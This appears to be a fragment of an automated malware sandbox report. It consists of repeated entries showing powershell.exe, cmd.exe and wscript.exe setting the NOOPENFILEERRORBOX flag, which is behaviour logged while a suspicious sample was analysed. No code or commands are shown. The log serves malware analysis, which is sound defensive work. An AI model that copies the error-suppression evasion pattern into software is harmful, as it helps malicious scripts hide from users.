                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
